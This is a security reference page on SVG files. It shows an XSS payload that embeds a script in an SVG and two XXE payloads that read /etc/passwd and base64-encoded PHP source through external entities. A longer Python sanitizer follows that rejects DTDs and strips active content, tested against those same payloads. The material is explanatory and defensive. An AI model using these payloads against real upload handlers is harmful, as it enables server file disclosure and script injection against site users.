SVG

The SVG file type, or Scalable Vector Graphics, is an open standard defined by the World Wide Web Consortium (W3C) for representing two-dimensional graphics using XML. Unlike raster formats such as JPEG or PNG, which store images as pixel grids, SVG defines shapes, paths, text, and colors mathematically, allowing graphics to scale to any resolution without loss of quality. This characteristic makes SVG ideal for icons, diagrams, logos, and illustrations that must remain sharp across different screen sizes and display densities.

Because SVG is text-based and structured in XML, its contents can be created, edited, or inspected directly with a text editor. The format supports styling via CSS, scripting via JavaScript, and interactive elements such as hyperlinks or animations, effectively bridging the gap between static images and dynamic web content. While these features provide flexibility, they also introduce potential attack vectors. Maliciously crafted SVGs can include embedded scripts or external references that may be abused in environments where proper sanitization is absent.

XSS

We can include XSS payloads within the XML data of SVG images. Once the image is displayed, the payload will be triggered. Note that browsers execute the script only when the SVG is rendered as a document (opened directly, or embedded via `<object>`, `<embed>` or `<iframe>`), not when it is referenced from an `<img>` tag or a CSS background, so the impact depends on how the application serves the uploaded file.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
    <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
    <script type="text/javascript">alert(window.origin);</script>
</svg>

XXE

We can also perform XXE (XML External Entity injection) attacks using SVG images, which can be used for reading the web application's source files. This only works when the server-side XML parser that processes the SVG resolves external entities; the first payload below reads a local file, the second uses a PHP filter wrapper to return the source of index.php base64-encoded so that the XML stays well-formed.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
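Both the XSS and the XXE payloads above only matter where the receiving side parses or renders untrusted SVG without restrictions. The following Python is an added example, not code from the original page: a server-side check for SVG uploads that refuses any document carrying a DOCTYPE (so no entity can be declared or expanded, which covers the XXE section) and strips script elements, inline event-handler attributes and external href references (which covers the XSS section). It uses only the standard library; the element and attribute policy, the helper names and the constructed sample inputs are assumptions, not anything the page specifies.

```python
"""Defensive SVG handling: refuse DTDs (the XXE vector) and strip the active
content (scripts, event handlers, external references) that makes an uploaded
SVG an XSS vector. Standard library only; policy below is an assumption."""
import xml.parsers.expat
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Assumed policy: elements that can run code or pull in foreign content go.
DROP_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}
# Attributes that may carry a URL and therefore an external reference.
URL_ATTRS = {"href", f"{{{XLINK_NS}}}href"}


class UnsafeSvg(ValueError):
    """Raised when the document must be rejected rather than cleaned."""


def _local(name: str) -> str:
    """'{namespace}tag' -> 'tag'; plain names pass through unchanged."""
    return name.rsplit("}", 1)[-1]


def reject_dtd(data: bytes) -> None:
    """Pass 1: fail closed on any DOCTYPE or ENTITY declaration.

    Expat callbacks fire before any entity could be expanded. Expat never
    fetches file:// or php:// targets without an ExternalEntityRefHandler,
    but rejecting the DTD outright makes the policy explicit and also blocks
    entity-expansion (billion laughs) style denial of service."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeSvg(f"DOCTYPE not allowed (root element {name!r})")

    def on_entity(*_):
        raise UnsafeSvg("ENTITY declaration not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)


def sanitize_svg(data: bytes) -> tuple:
    """Pass 2: parse (DTD already rejected) and strip active content.
    Returns (cleaned markup, list of removals) so the caller can log them."""
    reject_dtd(data)
    root = ET.fromstring(data)
    removed = []

    # Snapshot the tree walk so removing children does not disturb iteration.
    for parent in list(root.iter()):
        for child in list(parent):
            if _local(child.tag) in DROP_ELEMENTS:
                parent.remove(child)
                removed.append(f"element <{_local(child.tag)}>")

    for el in root.iter():
        for attr in list(el.attrib):
            name = _local(attr)
            value = el.attrib[attr].strip()
            if name.lower().startswith("on"):
                # onload=, onclick=, onbegin=, ...: inline event handlers
                del el.attrib[attr]
                removed.append(f"attribute {name} on <{_local(el.tag)}>")
            elif attr in URL_ATTRS and not value.startswith("#"):
                # Only same-document fragment references are kept.
                del el.attrib[attr]
                removed.append(f"external {name}={value!r} on <{_local(el.tag)}>")

    ET.register_namespace("", SVG_NS)
    ET.register_namespace("xlink", XLINK_NS)
    return ET.tostring(root, encoding="unicode"), removed


def check_upload(data: bytes) -> dict:
    """What an upload handler would call: never raises, returns a verdict."""
    try:
        cleaned, removed = sanitize_svg(data)
    except (UnsafeSvg, ET.ParseError, xml.parsers.expat.ExpatError) as exc:
        return {"accepted": False, "reason": str(exc), "svg": None, "removed": []}
    return {"accepted": True, "reason": None, "svg": cleaned, "removed": removed}


# Constructed sample: an upload mixing benign shapes with the XSS-style content.
CONSTRUCTED_UPLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="1" height="1" onload="alert(1)">
  <rect x="1" y="1" width="1" height="1" fill="green"/>
  <script type="text/javascript">alert(window.origin);</script>
  <use xlink:href="https://example.invalid/remote.svg#x"/>
  <a href="#local"><circle r="1"/></a>
</svg>"""

# Constructed sample: the XXE payload shape from this page.
XXE_SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>"""

if __name__ == "__main__":
    for label, sample in (("upload", CONSTRUCTED_UPLOAD), ("xxe", XXE_SAMPLE)):
        verdict = check_upload(sample)
        print(label, "accepted" if verdict["accepted"] else "rejected",
              verdict["removed"] or verdict["reason"])
```

The two-pass design is deliberate: the DTD check runs on a bare expat parser with no entity handlers, so the decision to reject is made before any element tree exists, and the second pass only ever sees documents that contain no entity declarations. Everything the sanitizer strips is returned to the caller, which is the signal worth logging when hunting for attempted SVG abuse.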
